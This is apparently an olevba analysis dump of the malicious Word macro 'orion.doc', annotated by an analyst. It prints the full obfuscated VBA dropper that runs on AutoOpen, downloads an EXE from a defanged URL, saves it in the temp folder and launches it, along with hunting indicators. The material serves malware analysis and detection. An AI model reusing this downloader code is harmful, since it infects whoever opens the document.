dynamoo

Malicious Word macro (orion.doc): olevba dump of a VBA downloader that fetches an EXE over WinINet, writes it to the temp folder and launches it via Shell.Application; all strings are XOR/hex-obfuscated and decoded at run time

Apr 8th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- orion.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: orion.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: orion.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
' Entry stub reached from autoopen(). Its only action is to call CALTHA
' (module PIDLE0), which starts the download-and-execute chain.
Sub InIn()
CALTHA
End Sub
  19.  
' AutoOpen handler: Word runs this as soon as the document is opened with
' macros enabled, so the payload chain needs no further user interaction
' (olevba flags it as AutoExec below).
Sub autoopen()
InIn
End Sub
  23.  
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. ANALYSIS:
  26. +----------+----------+---------------------------------------+
  27. | Type     | Keyword  | Description                           |
  28. +----------+----------+---------------------------------------+
  29. | AutoExec | AutoOpen | Runs when the Word document is opened |
  30. +----------+----------+---------------------------------------+
  31. -------------------------------------------------------------------------------
  32. VBA MACRO FILE6.bas
  33. in file: orion.doc - OLE stream: u'Macros/VBA/FILE6'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35.  
Option Explicit
' Decoy constant; nothing in the visible modules reads it. The operative
' strings are XOR-decoded at run time by C8C8C8 (module PIDLE0).
Public Const C1C1C1A = "BRITTANY"

' WinINet imports hidden behind meaningless names. The Alias clauses give
' the real functions:
'   C1C1C1 -> InternetCloseHandle
'   C2C2C2 -> InternetOpenA
'   C3C3C3 -> InternetReadFile
'   C4C4C4 -> InternetOpenUrlA
' The VBA7/Win64 branch uses PtrSafe and LongPtr handles for 64-bit Office;
' the #Else branch is the 32-bit equivalent with Long handles.
' NOTE(review): InternetCloseHandle is declared with a ByRef handle, so the
' callers in C16C16C16 hand the API the *address* of the handle variable,
' not the handle; those close calls most likely fail silently (return
' value is ignored there).
#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
C1C1C1 Lib _
"wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
Public _
Declare _
PtrSafe _
Function _
C2C2C2 Lib _
"wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
Public _
Declare _
PtrSafe _
Function _
C3C3C3 Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
C4C4C4 Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
#Else
Public Declare Function C1C1C1 Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
Public Declare Function C2C2C2 Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
Public Declare Function C3C3C3 Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public Declare Function C4C4C4 Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
#End If



' Size of the fixed-length read buffer and the byte count passed to each
' InternetReadFile call in C16C16C16.
Private Const BRANDI = 8162
' User-agent string handed to InternetOpenA (first argument) - a usable
' network indicator: "HAZ".
Private Const BRANDY As String = "HAZ"
' Second argument to InternetOpenA (dwAccessType); 1 looks like
' INTERNET_OPEN_TYPE_DIRECT - confirm against wininet.h.
Private Const BREANA = 1
' Fifth argument to InternetOpenUrlA (dwFlags) in BRITANNIA; &H4000000
' presumably is INTERNET_FLAG_NO_CACHE_WRITE - confirm against wininet.h.
Private Const BREDA = &H4000000
  81.  
' Downloader. Opens a WinINet session, lets BRITANNIA open the decoded
' payload URL on it, reads the response body into a String and writes it
' as a raw binary file at path BREE.
'   BREE    - destination path (built by C6C6C6 as temp folder + "\c48.exe")
'   returns - True if at least one byte was accumulated, False otherwise
'             (session open failed, or the URL handle was 0).
' There is no On Error handler: a failure in Open/Put raises into the caller.
Public Function C16C16C16 _
(ByVal BREE As String) As Boolean
    #If VBA7 _
    And Win64 Then
        Dim BRETT As LongPtr, BRIANNA As LongPtr
    #Else
        Dim BRETT As Long, BRIANNA As Long
    #End If
    ' BRETT = session handle (InternetOpenA), BRIANNA = URL handle (InternetOpenUrlA)
    Dim BRIAR As Long
    ' BRIAR = bytes read by the last InternetReadFile call (ByRef out-param)
    Dim C33C33C33 As String * BRANDI, BRIELLE As String
    ' C33C33C33 = fixed 8162-char read buffer (shadows the Declare's parameter
    ' name by coincidence); BRIELLE = accumulated response body
    Dim BRIER As Integer, BRIONY As Double
    ' BRIER = file number; BRIONY = byte count written, doubles as the result flag
    ' InternetOpenA(agent = "HAZ", accessType = BREANA, no proxy, no bypass, flags = 0)
    BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0)
    If BRETT = 0 Then
        Exit Function
    End If
    ' Unused local; the only non-pattern identifier in the sample.
    Dim FiGaMan As Boolean
   
    ' BRITANNIA always returns True; its effect is setting BRIANNA to the
    ' handle for the decoded URL (0 if InternetOpenUrlA failed).
    If BRITANNIA(BRIANNA, BRETT) Then
    End If
    If BRIANNA = 0 Then
        BRIONY = 0
    Else
        ' First read: the whole fixed-length buffer is copied, not just BRIAR
        ' bytes, so a short first read leaves buffer padding in the saved file.
        C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
        BRIELLE = C33C33C33
        ' Subsequent reads append exactly BRIAR bytes until a read returns 0.
        ' The API's return value is never checked; if a call fails without
        ' touching BRIAR this loop would not terminate.
        Do While BRIAR <> 0
            C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
           
            ' Padding: BRITT only ranges 6..8, so "End" never executes.
            Dim BRITT As Long
For BRITT = 6 To 8
If BRITT = 38 Then End
Next BRITT
           
            BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR)
        Loop
            BRIONY = Len(BRIELLE): BRIER = FreeFile
        ' Write the body to BREE in Binary mode; Put with an omitted record
        ' number writes from the start of the freshly opened file.
        Open BREE _
            For Binary Access Write _
        Lock Write _
        As #BRIER
        Put #BRIER, _
                , BRIELLE
        ' Padding: BRITTA only ranges 2..3, so "End" never executes.
        Dim BRITTA As Double
            For BRITTA = 2 To 3
    If BRITTA = 37 Then End
Next BRITTA
        Close #BRIER
    End If
    ' See the Declare block: the handle is passed ByRef, so these close
    ' calls most likely do not close anything.
    C1C1C1 BRIANNA
    C1C1C1 BRETT
    BRIELLE = ""
    If BRIONY Then
        C16C16C16 = True
    End If
End Function
  136.  
  137.  
  138. Public Function CANDICE(CANDIDA As String) As Integer
  139. CANDICE = Len(CANDIDA)
  140. End Function
  141.  
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. ANALYSIS:
  144. +------------+----------------+-----------------------------------------+
  145. | Type       | Keyword        | Description                             |
  146. +------------+----------------+-----------------------------------------+
  147. | Suspicious | Lib            | May run code from a DLL                 |
  148. | Suspicious | Open           | May open a file                         |
  149. | Suspicious | Write          | May write to a file (if combined with   |
  150. |            |                | Open)                                   |
  151. | Suspicious | Put            | May write to a file (if combined with   |
  152. |            |                | Open)                                   |
  153. | Suspicious | Binary         | May read or write a binary file (if     |
  154. |            |                | combined with Open)                     |
  155. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  156. |            |                | be used to obfuscate strings (option    |
  157. |            |                | --decode to see all)                    |
  158. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  159. |            |                | may be used to obfuscate strings        |
  160. |            |                | (option --decode to see all)            |
  161. | IOC        | wininet.dll    | Executable file name                    |
  162. +------------+----------------+-----------------------------------------+
  163. -------------------------------------------------------------------------------
  164. VBA MACRO PIDLE0.bas
  165. in file: orion.doc - OLE stream: u'Macros/VBA/PIDLE0'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167.  
  168.  
  169.  
  170. Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String
  171.    
  172.     Dim CAMILLE As Integer
  173.     Dim CAMMIE As Integer
  174.    
  175.    
  176.     Dim CAMRYN As Double
  177. For CAMRYN = 1 To 3
  178. If CAMRYN = 32 Then End
  179. Next CAMRYN
  180.    
  181.     Dim CANDACE As Long
  182.     Dim CANDI As String
  183.     For CANDACE = 1 _
  184.     To _
  185.     ( _
  186.     CANDICE _
  187.     (CAMILLA) _
  188.     / 2)
  189.         CAMILLE = Val("&H" & _
  190.         (Mid$(CAMILLA, _
  191.         (2 * CANDACE) - 1, 2)))
  192.         CAMMIE = Asc(Mid$(CAMERON, _
  193.         ((CANDACE Mod Len(CAMERON)) + 1), 1))
  194.         CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
  195.     Next CANDACE
  196.    C8C8C8 = CANDI
  197. End Function
  198.  
  199.  
  200.  
' Instantiates a COM object whose ProgID is decoded at run time so it never
' appears in clear text. With key C9C9C9 and constant C10C10C10 (module
' IDL4), C8C8C8 hand-decodes to "Scripting.FileSystemObject", so this
' returns a FileSystemObject used by C6C6C6 for path/exists/delete work.
Public Function C21C21C21() As Object
Dim C22C22C22 As String
C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
Set C21C21C21 = CreateObject(C22C22C22)
End Function
  206.  
  207.  
' Second hop of the AutoOpen chain (ThisDocument.InIn -> CALTHA -> CALANTHA).
' The loop is padding: CANDIS runs 44..46, so "End" never executes. The
' literal 89 is passed on to CALANTHA, which ignores its argument.
Sub CALTHA()
        Dim CAMELLIA As Long

    Dim CANDIS As Double
For CANDIS = 44 To 46
If CANDIS = 32 Then End
Next CANDIS
CAMELLIA = 89
CALANTHA (CAMELLIA)

End Sub
  219. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  220. ANALYSIS:
  221. +------------+--------------+-----------------------------------------+
  222. | Type       | Keyword      | Description                             |
  223. +------------+--------------+-----------------------------------------+
  224. | Suspicious | CreateObject | May create an OLE object                |
  225. | Suspicious | Chr          | May attempt to obfuscate specific       |
  226. |            |              | strings                                 |
  227. | Suspicious | Xor          | May attempt to obfuscate specific       |
  228. |            |              | strings                                 |
  229. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  230. |            |              | be used to obfuscate strings (option    |
  231. |            |              | --decode to see all)                    |
  232. +------------+--------------+-----------------------------------------+
  233. -------------------------------------------------------------------------------
  234. VBA MACRO IDL4.bas
  235. in file: orion.doc - OLE stream: u'Macros/VBA/IDL4'
  236. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  237.  
  238.  
' Obfuscated strings. C9C9C9 is the repeating XOR key; the others are hex
' byte strings decoded at run time with C8C8C8(C9C9C9, X). Running that
' routine by hand over these values gives (defanged):
'   C18C18C18 -> "Shell.Application"            (C6C6C6: object whose .Open runs the file)
'   C19C19C19 -> "\c48.exe"                      (C6C6C6: file name appended to the temp folder)
'   C20C20C20 -> "hxxp://fzsv[.]de/11/004.exe"   (BRITANNIA: download URL)
'   C10C10C10 -> "Scripting.FileSystemObject"    (C21C21C21: ProgID for CreateObject)
' olevba's "Hex Strings" hit on this module is these constants.
Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D"
Public Const C19C19C19 = "6850770C1D264C56"
Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51"
Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747"
Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43"
  244.  
  245.  
  246. Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
  247. If CAILEIGH.FileExists(CAILYN) Then
  248. CADY = True
  249. Else
  250. CADY = False
  251. End If
  252. End Function
' Opens the payload URL on an existing WinINet session.
'   CALIDA - (ByRef, out) receives the InternetOpenUrlA handle, 0 on failure
'   CALLA  - session handle from InternetOpenA (see C16C16C16)
'   returns True unconditionally; the caller tests CALIDA instead.
' The URL is decoded at call time from C20C20C20 with key C9C9C9; decoding
' by hand gives hxxp://fzsv[.]de/11/004.exe. Argument order follows the
' InternetOpenUrlA alias: (hInternet, lpszUrl, lpszHeaders, dwHeadersLength,
' dwFlags = BREDA, dwContext = 0). The function header is duplicated under
' conditional compilation only to switch LongPtr/Long for 64/32-bit Office.
#If VBA7 _
    And Win64 Then
       Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
    #Else
       Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
    #End If
Dim CALLIDORA As String
    ' Decoded download URL.
    CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
   
                CALIDA _
    = C4C4C4 _
    ( _
    CALLA, _
    CALLIDORA, vbNullString, _
    0, _
    BREDA, 0)
    BRITANNIA = True
End Function
  271.  
  272.  
  273. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  274. ANALYSIS:
  275. +------------+-------------+-----------------------------------------+
  276. | Type       | Keyword     | Description                             |
  277. +------------+-------------+-----------------------------------------+
  278. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  279. |            |             | be used to obfuscate strings (option    |
  280. |            |             | --decode to see all)                    |
  281. +------------+-------------+-----------------------------------------+
  282. -------------------------------------------------------------------------------
  283. VBA MACRO M.bas
  284. in file: orion.doc - OLE stream: u'Macros/VBA/M'
  285. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  286.  
  287.  
' Returns GetSpecialFolder(2) from the FileSystemObject C23C23C23. In the
' Scripting runtime's SpecialFolderConst enumeration 2 is TemporaryFolder,
' so this yields the user's temp directory as a Folder object, which C6C6C6
' then concatenates with the decoded file name.
Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
End Function
' Third hop of the call chain. The parameter CALEIGH is never read and the
' string literal passed to C25C25C25 is likewise ignored by it; both exist
' only to pad the call graph.
Sub CALANTHA(CALEIGH As Long)

C25C25C25 ("CACACARDRDRDRD")
End Sub
  295.  
  296.  
' Pass-through: ignores C24C24C24 and calls C6C6C6, the routine that does
' the actual download and launch. Declared as a Function but never sets a
' return value (returns Empty).
Public Function C25C25C25(C24C24C24 As String)
C6C6C6
End Function
  300.  
' Payload routine: build the drop path, fetch the executable, run it.
' Every string is produced by C8C8C8 with key C9C9C9 at run time, so no
' ProgID, file name or URL is visible in the source. No return value is
' set and there is no On Error handler.
' Hunting notes grounded in this code: WINWORD loading wininet.dll, a new
' .exe written to the temp folder (name decodes to c48.exe), and a child
' process started through Shell.Application from a Word macro.
Public Function C6C6C6()

Dim C7C7C7  As Object
' Scripting.FileSystemObject (ProgID decoded in C21C21C21).
Set C7C7C7 = C21C21C21
Dim C11C11C11 As Object
' Special folder 2 of the FSO = temp folder (see C5C5C5).
Set C11C11C11 = C5C5C5(C7C7C7)

Dim C15C15C15
Dim C12C12C12
' C19C19C19 hand-decodes to "\c48.exe".
C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
' "&" on the Folder object uses its default property, so C15C15C15 is
' presumably "<temp folder path>\c48.exe" - confirm on a live run.
C15C15C15 = C11C11C11 & C12C12C12


' Delete any previous copy before downloading over it.
If CADY(C7C7C7, C15C15C15) Then
C7C7C7. _
DeleteFile C15C15C15
End If
' Download to that path; the Boolean result is discarded.
If C16C16C16(C15C15C15) Then
End If
' Existence re-check whose result is also discarded (padding).
If CADY(C7C7C7, C15C15C15) Then
End If
Dim C17C17C17
' C18C18C18 hand-decodes to "Shell.Application". Its Open method opens the
' item with its default action, which for an .exe means executing it.
' If the download produced no file this step fails rather than being
' skipped, since nothing above checks the result.
Set C17C17C17 = CreateObject _
(C8C8C8 _
(C9C9C9, C18C18C18))
C17C17C17.Open C15C15C15
End Function
  328.  
  329.  
  330. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  331. ANALYSIS:
  332. +------------+--------------+-----------------------------------------+
  333. | Type       | Keyword      | Description                             |
  334. +------------+--------------+-----------------------------------------+
  335. | Suspicious | CreateObject | May create an OLE object                |
  336. | Suspicious | Open         | May open a file                         |
  337. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  338. |            |              | be used to obfuscate strings (option    |
  339. |            |              | --decode to see all)                    |
  340. +------------+--------------+-----------------------------------------+
  341. -------------------------------------------------------------------------------
  342. VBA MACRO UserForm1.frm
  343. in file: orion.doc - OLE stream: u'Macros/VBA/UserForm1'
  344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  345. (empty macro)